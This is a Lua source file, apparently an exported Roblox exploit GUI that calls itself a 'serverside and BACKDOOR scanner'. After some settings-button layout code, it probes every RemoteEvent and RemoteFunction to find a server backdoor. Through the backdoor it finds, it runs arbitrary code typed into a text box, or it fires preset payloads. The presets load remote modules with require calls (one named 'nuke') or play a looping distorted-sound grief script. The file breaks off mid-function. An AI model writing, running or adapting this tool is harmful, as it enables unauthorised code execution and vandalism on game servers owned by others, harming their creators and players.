-- StarterGui.ScreenGui.Frame.page5.TextLabel
G2L["a3"] = Instance.new("TextLabel", G2L["a0"]);
G2L["a3"]["TextWrapped"] = true;
G2L["a3"]["BorderSizePixel"] = 0;
G2L["a3"]["TextSize"] = 14;
G2L["a3"]["TextScaled"] = true;
G2L["a3"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a3"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a3"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a3"]["BackgroundTransparency"] = 1;
G2L["a3"]["Size"] = UDim2.new(0, 120, 0, 25);
G2L["a3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a3"]["Text"] = [[Theme color]];
G2L["a3"]["Position"] = UDim2.new(0, 0, 0.13077, 0);


-- StarterGui.ScreenGui.Frame.page5.TextLabel.UIStroke
G2L["a4"] = Instance.new("UIStroke", G2L["a3"]);



-- StarterGui.ScreenGui.Frame.page5.TextLabel.UIStroke
G2L["a5"] = Instance.new("UIStroke", G2L["a3"]);
G2L["a5"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["a6"] = Instance.new("TextButton", G2L["a0"]);
G2L["a6"]["BorderSizePixel"] = 0;
G2L["a6"]["TextSize"] = 14;
G2L["a6"]["TextColor3"] = Color3.fromRGB(76, 76, 76);
G2L["a6"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["a6"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a6"]["BackgroundTransparency"] = 1;
G2L["a6"]["Size"] = UDim2.new(0, 90, 0, 25);
G2L["a6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a6"]["Text"] = [[Default]];
G2L["a6"]["Position"] = UDim2.new(0.33241, 0, 0.13077, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["a7"] = Instance.new("UIStroke", G2L["a6"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["a8"] = Instance.new("UIStroke", G2L["a6"]);
G2L["a8"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["a9"] = Instance.new("LocalScript", G2L["a6"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["aa"] = Instance.new("TextButton", G2L["a0"]);
G2L["aa"]["BorderSizePixel"] = 0;
G2L["aa"]["TextSize"] = 14;
G2L["aa"]["TextColor3"] = Color3.fromRGB(171, 0, 0);
G2L["aa"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["aa"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["aa"]["BackgroundTransparency"] = 1;
G2L["aa"]["Size"] = UDim2.new(0, 90, 0, 25);
G2L["aa"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["aa"]["Text"] = [[Red]];
G2L["aa"]["Position"] = UDim2.new(0.58172, 0, 0.13077, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["ab"] = Instance.new("UIStroke", G2L["aa"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["ac"] = Instance.new("UIStroke", G2L["aa"]);
G2L["ac"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["ad"] = Instance.new("LocalScript", G2L["aa"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["ae"] = Instance.new("TextButton", G2L["a0"]);
G2L["ae"]["BorderSizePixel"] = 0;
G2L["ae"]["TextSize"] = 14;
G2L["ae"]["TextColor3"] = Color3.fromRGB(0, 0, 255);
G2L["ae"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["ae"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["ae"]["BackgroundTransparency"] = 1;
G2L["ae"]["Size"] = UDim2.new(0, 61, 0, 25);
G2L["ae"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["ae"]["Text"] = [[Blue]];
G2L["ae"]["Position"] = UDim2.new(0.83102, 0, 0.13077, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["af"] = Instance.new("UIStroke", G2L["ae"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["b0"] = Instance.new("UIStroke", G2L["ae"]);
G2L["b0"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["b1"] = Instance.new("LocalScript", G2L["ae"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["b2"] = Instance.new("TextButton", G2L["a0"]);
G2L["b2"]["BorderSizePixel"] = 0;
G2L["b2"]["TextSize"] = 14;
G2L["b2"]["TextColor3"] = Color3.fromRGB(0, 255, 0);
G2L["b2"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["b2"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["b2"]["BackgroundTransparency"] = 1;
G2L["b2"]["Size"] = UDim2.new(0, 61, 0, 25);
G2L["b2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b2"]["Text"] = [[Green]];
G2L["b2"]["Position"] = UDim2.new(0, 0, 0.23462, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["b3"] = Instance.new("UIStroke", G2L["b2"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["b4"] = Instance.new("UIStroke", G2L["b2"]);
G2L["b4"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["b5"] = Instance.new("LocalScript", G2L["b2"]);



-- StarterGui.ScreenGui.Frame.TextButton
G2L["b6"] = Instance.new("TextButton", G2L["3"]);
G2L["b6"]["TextWrapped"] = true;
G2L["b6"]["TextSize"] = 14;
G2L["b6"]["TextScaled"] = true;
G2L["b6"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b6"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["b6"]["BackgroundTransparency"] = 1;
G2L["b6"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["b6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b6"]["Text"] = [[SETTINGS]];
G2L["b6"]["Position"] = UDim2.new(0, 0, 0.7027, 0);


-- StarterGui.ScreenGui.Frame.TextButton.UIStroke
G2L["b7"] = Instance.new("UIStroke", G2L["b6"]);



-- StarterGui.ScreenGui.Frame.TextButton.UIStroke
G2L["b8"] = Instance.new("UIStroke", G2L["b6"]);
G2L["b8"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
G2L["b9"] = Instance.new("LocalScript", G2L["b6"]);



-- StarterGui.ScreenGui.Scanner
local function C_2()
local script = G2L["2"];
	local replicatedStorage = game:GetService("ReplicatedStorage")
	local starterGui = game:GetService("StarterGui")
	local players = game:GetService("Players")
	local screenGui = script.Parent
	local frame = screenGui:FindFirstChildOfClass("Frame"):FindFirstChild("page2")
	local username = players.LocalPlayer.Name
	
	-- GUI references inside Frame
	local textbox = frame:FindFirstChild("Text"):FindFirstChild("TextBox")
	local executeButton = frame:FindFirstChild("Execute")
	local clearButton = frame:FindFirstChild("Clear")
	local injectButton = frame:FindFirstChild("Inject")
	local r6Button = frame:FindFirstChild("R6")
	local statusLabel = script.Parent.Frame.page1.Status
	
	if not textbox or not executeButton or not clearButton or not injectButton or not r6Button or not statusLabel then
		warn("Missing GUI components.")
		return
	end
	
	-- Global storage using getgenv()
	getgenv().confirmedBackdoor = nil
	getgenv().confirmedType = nil
	
	injectButton.MouseButton1Click:Connect(function()
		local testPayload = 'local h = Instance.new("Hint") h.Parent = game.Workspace h.Text = "project SHIFT X |BEST serverside and BACKDOOR scanner"'
		local found = false
		
		for _, obj in ipairs(replicatedStorage:GetDescendants()) do
			if obj:IsA("RemoteEvent") or obj:IsA("RemoteFunction") then
				for _, h in ipairs(workspace:GetChildren()) do
					if h:IsA("Hint") and h.Text == "project SHIFT X |BEST serverside and BACKDOOR scanner" then
						h:Destroy()
					end
				end
				
				pcall(function()
					if obj:IsA("RemoteEvent") then
						obj:FireServer(testPayload)
					elseif obj:IsA("RemoteFunction") then
						obj:InvokeServer(testPayload)
					end
				end)
				
				wait(0.5)
				
				for _, h in ipairs(workspace:GetChildren()) do
					if h:IsA("Hint") and h.Text == "project SHIFT X |BEST serverside and BACKDOOR scanner" then
						print("backdoor confirmed through " .. obj.ClassName .. ": " .. obj:GetFullName())
						getgenv().confirmedBackdoor = obj
						getgenv().confirmedType = obj.ClassName
						found = true
						
						pcall(function()
							starterGui:SetCore("SendNotification", {
								Title = "backdoor Found",
								Text = "backdoor found: " .. obj.Name,
								Duration = 5
							})
						end)
						
						statusLabel.Text = "status: injected"
						statusLabel.TextColor3 = Color3.fromRGB(0, 255, 127)
						break
					end
				end
				
				if found then break end
			end
		end
		
		if not found then
			print("no backdoor confirmed, better luck next time!")
			statusLabel.Text = "status: no backdoor detected."
			statusLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
		end
	end)
	
	executeButton.MouseButton1Click:Connect(function()
		local payload = textbox.Text
		if payload and payload ~= "" and getgenv().confirmedBackdoor then
			pcall(function()
				if getgenv().confirmedType == "RemoteEvent" then
					getgenv().confirmedBackdoor:FireServer(payload)
				elseif getgenv().confirmedType == "RemoteFunction" then
					getgenv().confirmedBackdoor:InvokeServer(payload)
				end
			end)
		end
	end)
	
	clearButton.MouseButton1Click:Connect(function()
		textbox.Text = ""
		warn("textbox wiped clean like grandma cookies")
	end)
	
	r6Button.MouseButton1Click:Connect(function()
		if getgenv().confirmedBackdoor then
			local r6Payload = 'require(3436957371):r6("' .. username .. '")'
			pcall(function()
				if getgenv().confirmedType == "RemoteEvent" then
					getgenv().confirmedBackdoor:FireServer(r6Payload)
				elseif getgenv().confirmedType == "RemoteFunction" then
					getgenv().confirmedBackdoor:InvokeServer(r6Payload)
				end
			end)
		end
	end)
	
	frame.RE.MouseButton1Click:Connect(function()
		if getgenv().confirmedBackdoor then
			local REPayload = 'game.Players.' .. username .. ':LoadCharacter()'
			if getgenv().confirmedType == "RemoteEvent" then
				getgenv().confirmedBackdoor:FireServer(REPayload)
			elseif getgenv().confirmedType == "RemoteFunction" then
				getgenv().confirmedBackdoor:InvokeServer(REPayload)
			end
		end
	end)
end;
task.spawn(C_2);
-- StarterGui.ScreenGui.Frame.Dragify
local function C_4()
local script = G2L["4"];
	local frame = script.Parent
	local UIS = game:GetService("UserInputService")
	
	local dragging = false
	local dragStart = nil
	local startPos = nil
	
	-- When mouse or touch begins
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = frame.Position
		end
	end)
	
	-- When mouse or touch ends
	frame.InputEnded:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = false
		end
	end)
	
	-- Update position while dragging
	UIS.InputChanged:Connect(function(input)
		if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
			local delta = input.Position - dragStart
			frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		end
	end)
end;
task.spawn(C_4);
-- StarterGui.ScreenGui.Frame.page1.ImageLabel.LocalScript
local function C_c()
local script = G2L["c"];
	-- Place this LocalScript inside the ImageLabel
	local Players = game:GetService("Players")
	local imageLabel = script.Parent
	local player = Players.LocalPlayer
	
	-- Wait until the player is fully loaded
	if not player.Character then
		player.CharacterAdded:Wait()
	end
	
	-- Get the player's thumbnail
	local function updateThumbnail()
		local userId = player.UserId
		local thumbnailType = Enum.ThumbnailType.HeadShot
		local thumbnailSize = Enum.ThumbnailSize.Size420x420
		
		local content, isReady = Players:GetUserThumbnailAsync(userId, thumbnailType, thumbnailSize)
		if isReady then
			imageLabel.Image = content
		end
	end
	
	updateThumbnail()
end;
task.spawn(C_c);
-- StarterGui.ScreenGui.Frame.page1.TextLabel.LocalScript
local function C_f()
local script = G2L["f"];
	script.Parent.Text = 'Welcome, ' .. game.Players.LocalPlayer.Name .. '!'
end;
task.spawn(C_f);
-- StarterGui.ScreenGui.Frame.page2.Text.LocalScript
local function C_1b()
local script = G2L["1b"];
	local scrollingFrame = script.Parent
	local lastY = scrollingFrame.CanvasSize.Y.Offset
	
	game:GetService("RunService").RenderStepped:Connect(function()
		local currentY = scrollingFrame.CanvasSize.Y.Offset
		
		if currentY > lastY then
			-- Expansion detected, scroll to bottom once
			scrollingFrame.CanvasPosition = Vector2.new(0, currentY)
			lastY = currentY
		end
	end)
end;
task.spawn(C_1b);
-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.LocalScript
local function C_21()
local script = G2L["21"];
	local textBox = script.Parent
	local parent = textBox.Parent
	local textLabel = parent:FindFirstChild("TextLabel")
	
	local function updateLineNumbers()
		if not textLabel then return end
		
		local lines = string.split(textBox.Text, "\n")
		local numberedLines = {}
		
		for i = 1, #lines do
			table.insert(numberedLines, tostring(i))
		end
		
		textLabel.Text = table.concat(numberedLines, "\n")
	end
	
	textBox:GetPropertyChangedSignal("Text"):Connect(updateLineNumbers)
	
	updateLineNumbers()
end;
task.spawn(C_21);
-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.Completor
local function C_22()
local script = G2L["22"];
	local textBox = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local runService = game:GetService("RunService")
	
	local screenGui = textBox:FindFirstAncestorOfClass("ScreenGui")
	local memorizedKeywords = {}
	
	-- Tooltip container
	local tooltipFrame = Instance.new("ScrollingFrame")
	tooltipFrame.Name = "TooltipFrame"
	tooltipFrame.Size = UDim2.new(0, 200, 0, 100)
	tooltipFrame.BackgroundTransparency = 1
	tooltipFrame.BorderSizePixel = 0
	tooltipFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y
	tooltipFrame.ScrollBarThickness = 4
	tooltipFrame.Visible = false
	tooltipFrame.ZIndex = 999
	tooltipFrame.ClipsDescendants = true
	tooltipFrame.Parent = screenGui
	
	local layout = Instance.new("UIListLayout")
	layout.Padding = UDim.new(0, 2)
	layout.SortOrder = Enum.SortOrder.LayoutOrder
	layout.Parent = tooltipFrame
	
	-- Keyword groups
	local keywordGroups = {
		[Color3.fromRGB(170, 0, 65)] = { "return", "function", "local", "if", "else", "error", "end", "elseif", "break" },
		[Color3.fromRGB(255, 255, 0)] = { ":Connect", ":IsA", ":FindFirstChild()", ":WaitForChild()", ":LoadCharacter()", "Clear()", "ClearAllChildren()" },
		[Color3.fromRGB(0, 85, 255)] = {
			"require", "game", "script", "print", "loadstring",
			"game.Workspace", "game.Players", "game.Lighting", "game.ReplicatedStorage", "game.ReplicatedFirst",
			"game.ServerScriptService", "game.ServerStorage", "game.StarterGui", "game.StarterPack", "game.StarterPlayer",
			"game.SoundService", "game.Chat", "game.LocalizationService", "game.MarketplaceService", "game.HttpService",
			"game.UserInputService", "game.ContextActionService", "game.RunService", "game.TweenService", "game.PathfindingService",
			"game.InsertService", "game.TestService", "game.VirtualInputManager", "game.VRService", "game.MessagingService",
			"game.NotificationService", "game.SocialService", "game.DataStoreService", "game.MemoryStoreService", "game.AssetService",
			"game.AdService", "game.AnalyticsService", "game.ScriptContext", "game.Selection", "game.GuiService", "game.InputService",
			"game.KeyframeSequenceProvider", "game.NavigationService", "game.Terrain", "game.Teams", "game.CollectionService",
			"game.ContentProvider", "game.Stats", "game.SoundscapeService", "game.ThumbnailGenerator", "game.TranslationService",
			"game.VoiceChatService", "game.ProximityPromptService", "game.TextChatService", "game.MaterialService",
			"game.FaceAnimatorService", "game.AnimationClipProvider", "game.AssetManagerService", "game.PluginDebugService",
			"game.StudioData", "game.StudioService", "game.SelectionService", "game.ToolboxService", "game.Draggers",
			"game.TemporaryScriptService"
		}
	}
	local memoryColor = Color3.fromRGB(158, 158, 158)
	
	local function clearTooltips()
		for _, child in ipairs(tooltipFrame:GetChildren()) do
			if child:IsA("GuiButton") then
				child:Destroy()
			end
		end
		tooltipFrame.Visible = false
	end
	
	local function createTooltip(text, color)
		local button = Instance.new("TextButton")
		button.Text = text
		button.BackgroundTransparency = 0.3
		button.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		button.TextColor3 = color
		button.Font = Enum.Font.SourceSans
		button.TextSize = 14
		button.Size = UDim2.new(1, 0, 0, 25)
		button.TextXAlignment = Enum.TextXAlignment.Left
		button.TextScaled = false
		button.AutoButtonColor = false
		button.Parent = tooltipFrame
		
		local stroke = Instance.new("UIStroke")
		stroke.Thickness = 1
		stroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Contextual
		stroke.Parent = button
		
		button.MouseButton1Click:Connect(function()
			textBox.Text = text
			textBox.CursorPosition = #text + 1
			clearTooltips()
		end)
	end
	
	local function scanMemory(text)
		if text == "" then
			table.clear(memorizedKeywords)
			return
		end
		
		for var in string.gmatch(text, "local%s+([%w_]+)%s*=") do
			memorizedKeywords[var] = true
		end
		
		for func in string.gmatch(text, "local%s+function%s+([%w_]+)") do
			memorizedKeywords[func] = true
		end
		
		for name in pairs(memorizedKeywords) do
			if not string.find(text, name) then
				memorizedKeywords[name] = nil
			end
		end
	end
	
	local function isInsideDeclaration(text)
		local lines = string.split(text, "\n")
		local lastLine = lines[#lines] or ""
		
		if string.match(lastLine, "^%s*local%s+function%s+[%w_]*$") then return true end
		if string.match(lastLine, "^%s*local%s+[%w_]*$") then return true end
		if string.match(lastLine, "^%s*local%s+[%w_]+%s*=%s*$") then return true end
		
		return false
	end
	
	local function updateTooltip()
		local text = textBox.Text
		local lastWord = string.match(text, "[%w_:%.%(%)]+$")
		
		scanMemory(text)
		clearTooltips()
		
		if not lastWord or #lastWord == 0 or isInsideDeclaration(text) then
			return
		end
		
		local matches = {}
		
		for color, group in pairs(keywordGroups) do
			for _, keyword in pairs(group) do
				if string.sub(keyword, 1, #lastWord):lower() == lastWord:lower() and keyword:lower() ~= lastWord:lower() then
					table.insert(matches, { text = keyword, color = color })
				end
			end
		end
		
		for name in pairs(memorizedKeywords) do
			if string.sub(name, 1, #lastWord):lower() == lastWord:lower() and name:lower() ~= lastWord:lower() then
				table.insert(matches, { text = name, color = memoryColor })
			end
		end
		
		if #matches > 0 then
			for _, match in ipairs(matches) do
				createTooltip(match.text, match.color)
			end
			
			local caretPos = textBox.CursorPosition
			local textBeforeCaret = string.sub(textBox.Text, 1, caretPos - 1)
			local size = textBox.TextSize
			local font = textBox.Font
			
			local tempLabel = Instance.new("TextLabel")
			tempLabel.Text = textBeforeCaret
			tempLabel.Font = font
			tempLabel.TextSize = size
			tempLabel.Size = UDim2.new(0, 0, 0, 0)
			tempLabel.Visible = false
			tempLabel.Parent = screenGui
			
			runService.RenderStepped:Wait()
			local offsetX = tempLabel.TextBounds.X
			tempLabel:Destroy()
			
			local baseX = textBox.AbsolutePosition.X
			local baseY = textBox.AbsolutePosition.Y
			
			tooltipFrame.Position = UDim2.new(0, baseX + offsetX + 10, 0, baseY + textBox.AbsoluteSize.Y + 5)
			tooltipFrame.Visible = true
		else
			clearTooltips()
		end
	end
	
	textBox:GetPropertyChangedSignal("Text"):Connect(updateTooltip)
end;
task.spawn(C_22);
-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.LocalScript
local function C_23()
local script = G2L["23"];
	script.Parent.Text = 'print("project transparent SS")'
end;
task.spawn(C_23);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_3c()
local script = G2L["3c"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(14125553864):Fire("' .. username .. '","c00lkidd")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_3c);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_40()
local script = G2L["40"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = ' require(14572394952)("' .. username .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_40);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_44()
local script = G2L["44"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(7192763922).load("' .. game.Players.LocalPlayer.Name .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_44);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_48()
local script = G2L["48"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(15267263357).V11("' .. game.Players.LocalPlayer.Name .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_48);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_4c()
local script = G2L["4c"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(78790302691160):Hload("' .. game.Players.LocalPlayer.Name .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_4c);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_50()
local script = G2L["50"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(12350030542).RC7("' .. game.Players.LocalPlayer.Name .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_50);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_54()
local script = G2L["54"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(17776365113).kj("' .. game.Players.LocalPlayer.Name .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_54);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_58()
local script = G2L["58"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = 'require(135686792632620).nuke("' .. game.Players.LocalPlayer.Name .. '")'
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_58);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_5c()
local script = G2L["5c"];
	local players = game:GetService("Players")
	local starterGui = game:GetService("StarterGui")
	local username = players.LocalPlayer.Name
	
	script.Parent.MouseButton1Click:Connect(function()
		local backdoor = getgenv().confirmedBackdoor
		local backdoorType = getgenv().confirmedType
		
		if not backdoor then
			pcall(function()
				starterGui:SetCore("SendNotification", {
					Title = "Project CTRL",
					Text = "Inject first before executing!",
					Duration = 5
				})
			end)
			return
		end
		
		local rawcode = [[local SoundService = game:GetService("SoundService")
		
	-- Sound IDs
		local soundIds = {
			82706813987936,
			76279547029713,
			135763933956435
		}
		
	-- Create and configure sounds
		local sounds = {}
		
	for _, id in ipairs(soundIds) do
		local sound = Instance.new("Sound")
		sound.SoundId = "rbxassetid://" .. id
		sound.Volume = 10
		sound.PlaybackSpeed = 0.2
			
	-- Add distortion effect (level 0.9)
		local distortion = Instance.new("DistortionSoundEffect")
		distortion.Level = 0.5
		distortion.Parent = sound
			
		sound.Parent = SoundService
		table.insert(sounds, sound)
	end
		
	-- Function to play sounds in sequence
		local function playSequence()
			while true do
				for _, sound in ipairs(sounds) do
					sound:Play()
					sound.Ended:Wait()
				end
			end
		end
		
	-- Start the loop
	playSequence()
	]]
		
		pcall(function()
			if backdoorType == "RemoteEvent" then
				backdoor:FireServer(rawcode)
			elseif backdoorType == "RemoteFunction" then
				backdoor:InvokeServer(rawcode)
			end
			
			starterGui:SetCore("SendNotification", {
				Title = "Project CTRL",
				Text = "Script executed successfully!",
				Duration = 5
			})
		end)
	end)
end;
task.spawn(C_5c);
-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
local function C_60()
local script = G2L["60"];
